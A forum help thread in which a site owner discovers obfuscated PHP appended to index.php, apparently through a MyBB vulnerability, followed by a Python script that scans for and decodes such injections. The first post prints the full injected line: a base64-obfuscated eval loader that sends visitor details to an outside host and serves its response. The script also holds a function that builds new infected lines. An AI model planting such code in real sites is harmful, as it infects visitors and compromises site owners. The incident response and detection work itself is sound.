Site Help
#1
Hey, today pbclan.tk was having some issues. I use PHP for my main site files; this is so I can edit the sidebar easily (I hate frames) by just using one function, and so I can track (easily) who hits what pages. The most major PHP/other script on my website is the forums, which I keep updated. MyBB (same as here).

My problem stemmed from errors like this: (xx ip was from the other site, yy was mine. Obscured so no spider picks these up)
[12-Oct-2011 15:55:53] PHP Warning:  file_get_contents(http://xx.xxx.xxx.xx/bt.php?ip=yy.yyy.yy.yyy&host=pbclan.tk&uri=%2F&ua=mozilla%2F5.0+%28macintosh%3B+intel+mac+os+x+10_7_1%29+applewebkit%2F535.1+%28khtml%2C+like+gecko%29+chrome%2F14.0.835.202+safari%2F535.1&ref=) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway
in /home/pbclan/public_html/index.php on line 44

I looked, and found this on line 44. However, I didn't see it until I scrolled over, as it was obscured by tons of whitespace (spaces or tabs, I don't recall):
?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
This would obviously throw the error, except how did this get into my file? I never added this myself; you can scan the site, there is no user data submission that seems like it could damage anything.
There were three lines like this in here, all removed now.

Thoughts on how this got in here? Google flagged this page as malicious, same with avast.
Should I talk to my host? Should I reexamine my security?

As I mentioned previously, I kept access logs examining who went where on my site. If need be, I can hand these logs over. Of course, only to those who I trust and who can help me.

Update: Got to the forums, now taking the whole site offline.

Update2: Got something similar related to MyBB and the current version: http://community.mybb.com/thread-105752.html
#2
Not an expert, but here's what I've gathered from teh Interwebs:
http://en.wikipedia.org/wiki/PHP#Security
http://en.wikipedia.org/wiki/Cross-site_scripting
Pay special attention to what the non-contributing code does or seems to be trying to do.
#3
Since there are other cases, it looks like an automated attack. Your MyBB was exploited to modify /index.php (append), but as far as I understand this was targeted at your visitors' browser by pretty much injecting an iframe.

Follow this to fix the issue http://community.mybb.com/thread-105780.html
and also check your other files for unknown/unseen code.

edit: i fail at grammar

it exploits java applets (accidentally did testing in a non-sandboxed browser, way to go SKB)

edit2: About 21,700 results (0.20 seconds) when googling <ip>/bt.php
#4
Ouch. That. Hurts.
Btw, I warmly recommend PHPSecInfo - among others, it helps you identify potentially dangerous features such as remote file_get_contents (allow_url_fopen), many of which are enabled by default in PHP.
#5
Alright, thank you. I think I know more about what problem I was having. It freaked me out as I first noticed it on my main page /index.php rather than the forum /forum/index.php

I already did the MyBB fix (check my second edit). Tempest, I will check that out. Thank you :)

It freaked me out as I had no idea what was happening :>

If you visited the site, you may have gotten some malware on your computer. From what I hear, it is stored in the cookies, so clear your cache and cookies and you should be good.
#6
Ok, site is back up. (double post yay!)

I found it was targeting all index.php files on my filesystem. It also targeted MyBB-specific files. I suggest that all MyBB forum admins fix the vulnerability that is talked about on this page: http://blog.mybb.com/2011/10/06/1-6-4-se...nerabilit/

I know this means these forums, and at least TyD's.
* Ronald_Reagan forgets about other forum software.

Seems to me that maybe oNe uses MyBB? :>

Anyways, I cleaned all the files that I saw were modified. Search for all index.php files on your system and make sure you clean those. Also, search for a portion of the above script to make sure no other files have it.
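The sweep post #6 recommends (find every PHP file carrying a copy of the injected line, and look at what it hides) can be scripted. The following is an added example, not code from this thread or from MyBB. It searches a web root for the `eval(base64_decode(` marker and then statically unwraps the `$_X` string the way the injected decoder does: the page's own eval'd blob base64-decodes to `$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');...`, so the hidden PHP is recovered with plain base64 plus that fixed character swap, without ever executing it. The web-root layout, the clean and infected fixture files, and the documentation-range address 203.0.113.5 in the fixture payload are all constructed for the demo.

```python
from __future__ import annotations

import base64
import os
import re
import tempfile

# Triage signature: the injected line on the page wraps its second stage in
# eval(base64_decode('...')). A literal substring is enough to find copies.
INJECT_MARKER = "eval(base64_decode("

# The page's own eval'd decoder blob, kept verbatim so decode_stub() can show
# what it does. It is only ever base64-decoded here, never executed.
DECODER_STUB_B64 = "JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="

# Second-stage unwrapper as read out of DECODER_STUB_B64:
#   $_X = base64_decode($_X);
#   $_X = strtr($_X, '123456aouie', 'aouie123456');
# PHP strtr() maps each character of the first string to the character at the
# same position in the second, so this is a fixed, reversible substitution.
STRTR_FROM = "123456aouie"
STRTR_TO = "aouie123456"
X_PATTERN = re.compile(r"\$_X='([A-Za-z0-9+/=]+)'")


def decode_stub(stub_b64: str) -> str:
    """Plain base64 decode of the eval'd decoder, to read what it does."""
    return base64.b64decode(stub_b64).decode("latin-1")


def unwrap_payload(infected_line: str) -> str | None:
    """Statically recover the hidden PHP from the $_X='...' string.
    Nothing is executed: base64, then the fixed character swap."""
    m = X_PATTERN.search(infected_line)
    if not m:
        return None
    raw = base64.b64decode(m.group(1)).decode("latin-1")
    return raw.translate(str.maketrans(STRTR_FROM, STRTR_TO))


def scan_tree(root: str) -> list[tuple[str, int, str]]:
    """Walk a web root and report (path, line number, recovered payload) for
    every line of a .php file that carries the eval/base64 marker."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            # latin-1 never raises on odd bytes, which matters for tampered files
            with open(path, encoding="latin-1") as fh:
                for no, line in enumerate(fh, 1):
                    if INJECT_MARKER in line:
                        payload = unwrap_payload(line) or "<$_X not in expected form>"
                        hits.append((path, no, payload))
    return hits


def make_sample_infection(inner_php: str) -> str:
    """Build a line shaped like the one on the page from a constructed inner
    payload (the inverse of unwrap_payload). Used here only for fixtures."""
    swapped = inner_php.translate(str.maketrans(STRTR_TO, STRTR_FROM))
    x = base64.b64encode(swapped.encode("latin-1")).decode()
    return ("?><?php $_F=__FILE__;$_X='" + x + "';"
            "eval(base64_decode('" + DECODER_STUB_B64 + "'));"
            "$tmp = file_get_contents($url); echo $tmp; ?>\n")


def demo() -> list[tuple[str, int, str]]:
    """Create a throwaway web root with a clean /index.php and an infected
    /forum/index.php (constructed fixtures, documentation IP), then scan it."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "forum"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'clean'; ?>\n")
    with open(os.path.join(root, "forum", "index.php"), "w") as fh:
        fh.write("<?php echo 'forum'; ?>\n")
        fh.write(make_sample_infection("?><?php $url = 'http://203.0.113.5/bt.php'; ?>"))
    return scan_tree(root)


if __name__ == "__main__":
    print(decode_stub(DECODER_STUB_B64))
    for path, no, payload in demo():
        print(f"{path}:{no}: {payload}")
```

Run it against a real document root by calling `scan_tree("/home/<account>/public_html")` instead of `demo()`; each hit prints the file, the line, and the deobfuscated `$url` assignment, which is what you want to keep for your own records before deleting the line. Finding and removing copies only removes the payload, not the way it got there, so the MyBB fix the thread links to and a check of the other modified files still have to happen.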